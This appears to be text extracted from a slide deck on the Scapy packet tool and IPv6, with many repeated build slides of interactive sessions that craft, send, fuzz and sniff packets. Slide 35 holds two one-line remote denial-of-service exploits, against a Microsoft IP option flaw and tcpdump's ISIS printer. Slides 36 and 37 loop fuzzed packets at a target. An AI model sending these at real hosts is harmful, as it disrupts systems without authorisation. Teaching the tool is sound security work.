The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 48: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/48.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>> a.ttl
64
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 49: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/49.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 50: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/50.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 51: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/51.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>> b
< IP proto=TCP dst=192.168.1.1 |
< TCP flags=FS |>>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 52: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/52.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>> b
< IP proto=TCP dst=192.168.1.1 |
< TCP flags=FS |>>
>>> b.command()
"IP(dst=’192.168.1.1’)/TCP(flags=3)"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 53: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/53.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationStacking
>>> b=a/TCP(flags="SF")
>>> b
< IP proto=TCP dst=192.168.1.1 |
< TCP flags=FS |>>
>>> b.command()
"IP(dst=’192.168.1.1’)/TCP(flags=3)"
>>> b.show()---[ IP ]---
version = 4
ihl = 0
tos = 0x0
len = 0
id = 1
flags =
frag = 0
ttl = 64
proto = TCP
chksum = 0x0
src = 192.168.8.14
dst = 192.168.1.1
options = ’’
---[ TCP ]---
sport = 20
dport = 80
seq = 0
ack = 0
dataofs = 0
reserved = 0
flags = FS
window = 0
chksum = 0x0
urgptr = 0
options =
P. Biondi / A. Ebalard Scapy and IPv6 networking 28/100
![Page 54: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/54.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationNavigation between layers
Layers of a packet can be accessed using the payload attribute :
p r i n t pkt . pay load . pay load . pay load . chksum
A better way :
The idiom Layer in packet tests the presence of a layer
The idiom packet[Layer] returns the asked layer
The idiom packet[Layer:3] returns the third instance of theasked layer
Example
i f UDP in pkt :p r i n t pkt [UDP ] . chksum
The code is independant from lower layers. It will work the samewhether pkt comes from PPP or from WEP with 802.1q
P. Biondi / A. Ebalard Scapy and IPv6 networking 29/100
![Page 55: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/55.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationBuilding and Dissecting
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 30/100
![Page 56: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/56.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationBuilding and Dissecting
>>> str(b)
’E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x0
1\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%
\x1e\x00\x00’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 30/100
![Page 57: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/57.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationBuilding and Dissecting
>>> str(b)
’E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x0
1\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%
\x1e\x00\x00’
>>> IP( )
< IP version=4L ihl=5L tos=0x0 len=40 id=1 flags= frag=0L ttl=64
proto=TCP chksum=0xf06f src=192.168.8.14 dst=192.168.1.1
options=’’ |< TCP sport=20 dport=80 seq=0L ack=0L dataofs=5L
reserved=16L flags=FS window=0 chksum=0x251e urgptr=0 |>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 30/100
![Page 58: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/58.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 59: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/59.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>> b.ttl=(10,14)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 60: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/60.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>> b.ttl=(10,14)
>>> b.payload.dport=[80,443]
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 61: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/61.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet ManipulationImplicit Packets
>>> b.ttl=(10,14)
>>> b.payload.dport=[80,443]
>>> [k for k in b][< IP ttl=10 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=10 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=11 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=11 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=12 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=12 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=13 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=13 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>,
< IP ttl=14 proto=TCP dst=192.168.1.1 |< TCP dport=80 flags=FS |>>,
< IP ttl=14 proto=TCP dst=192.168.1.1 |< TCP dport=443 flags=FS |>>]
P. Biondi / A. Ebalard Scapy and IPv6 networking 31/100
![Page 62: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/62.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
PS/PDF packet dump
>>> pkt.psdump()
>>> pkt.pdfdump()
Ethernet00 12 79 3d a3 6a
dst 00:12:79:3d:a3:6a
00 11 43 26 48 7e
src 00:11:43:26:48:7e
08 00
type 0x800
IPversion 4L
45
ihl 5L
00
tos 0x0
00 21
len 33
85 2a
id 34090flags DF
40 00
frag 0L
40
ttl 64
11
proto UDP
3e 81
chksum 0x3e81
ac 10 0f 02
src 172.16.15.2
ac 10
0f fe
dst 172.16.15.254options ”
UDP
81 1c
sport 33052
11 ab
dport 4523
00 0d
len 13
77 3f
chksum 0x773f
Raw
74 6f 74 6f 0a
load ’toto.n’
P. Biondi / A. Ebalard Scapy and IPv6 networking 32/100
![Page 63: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/63.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
The sprintf() method
Thanks to the sprintf() method, you can
make your own summary of a packet
abstract lower layers and focus on what’s interesting
Example
>>> a = IP(dst="192.168.8.1",ttl=12)/UDP(dport=123)
>>> a.sprintf("The source is %IP.src%")
’The source is 192.168.8.14’
“%”, “{” and “}” are special characters
they are replaced by “%%”, “%(” and “%)”
P. Biondi / A. Ebalard Scapy and IPv6 networking 33/100
![Page 64: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/64.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 65: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/65.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 66: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/66.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 67: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/67.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 68: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/68.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>> sendp("I’m travelling on Ethernet ", iface="eth0")
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 69: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/69.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>> sendp("I’m travelling on Ethernet ", iface="eth0")
tcpdump output:
01:55:31.522206 61:76:65:6c:6c:69 > 49:27:6d:20:74:72,
ethertype Unknown (0x6e67), length 27:
4927 6d20 7472 6176 656c 6c69 6e67 206f I’m.travelling.o
6e20 4574 6865 726e 6574 20 n.Ethernet.
P. Biondi / A. Ebalard Scapy and IPv6 networking 34/100
![Page 70: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/70.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 71: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/71.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
The same with Scapy :
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 72: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/72.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
The same with Scapy :
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
tcpdump isis print() Remote Denial of Service Exploit :225 lines
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 73: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/73.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending
Microsoft IP option DoS proof of concept is 115 lines of Ccode (without comments)
The same with Scapy :
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
tcpdump isis print() Remote Denial of Service Exploit :225 lines
The same with Scapy :
send( IP(dst="1.1.1.1")/GRE(proto=254)/’\x83\x1b \x01\x06\x12\x01\xff\x07\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x01\x07 \x00\x00’
)
P. Biondi / A. Ebalard Scapy and IPv6 networking 35/100
![Page 74: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/74.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
FuzzingConstructive fuzzing
The fuzz() function will transform a packet into a fuzzypacket.
The fuzzy packet can be sent in loop
Example
>>> IP(dst="target")/fuzz( UDP()/NTP(version=4) )< IP frag=0 proto=UDP dst=<Net target> |< UDP sport=ntp
dport=ntp |< NTP version=4 |>>>
>>> send(_, loop=1, verbose=0)
P. Biondi / A. Ebalard Scapy and IPv6 networking 36/100
![Page 75: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/75.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
FuzzingFuzzing by alteration
corrupt bytes(s, [p=0.01]) function will corrupt p% ofthe string with random bytes
corrupt bits() function will flip p% of the string’s bits
Any layer can accept those functions as tranformations to beapplied to the assembled layer
CorruptedBytes() and CorruptedBits() can createvolatile strings randomly corrupted
Example>>> payload="captured payload"
>>> send(IP(dst="target")/UDP()/Raw(load=CorruptedBits(payload)), loop=1)
Example
>>> send(IP(dst="target")/UDP()/NTP(stratum=1, post_transform=corrupt_bits),
loop=1)
P. Biondi / A. Ebalard Scapy and IPv6 networking 37/100
![Page 76: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/76.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 77: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/77.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 78: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/78.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 79: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/79.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 80: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/80.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 81: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/81.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 82: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/82.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 83: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/83.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 84: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/84.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 85: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/85.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
< test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 86: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/86.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
< test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a[0]
< Ether dst=00:12:2a:71:1d:2f src=00:02:4e:9d:db:c3 type=0x800 |<
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 87: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/87.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 88: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/88.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
P. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 89: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/89.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 90: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/90.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>> a=sniff(iface="wlan0",prn=lambda x: \
x.sprintf("%Dot11.addr2% ")+("#"*(x.signal/8)))
Requires wlan0 interface to provide Prism headersP. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 91: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/91.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>> a=sniff(iface="wlan0",prn=lambda x: \
x.sprintf("%Dot11.addr2% ")+("#"*(x.signal/8)))
00:06:25:4b:00:f3 ######################
00:04:23:a0:59:bf #########
00:04:23:a0:59:bf #########
00:06:25:4b:00:f3 #######################
00:0d:54:99:75:ac #################
00:06:25:4b:00:f3 #######################
Requires wlan0 interface to provide Prism headersP. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
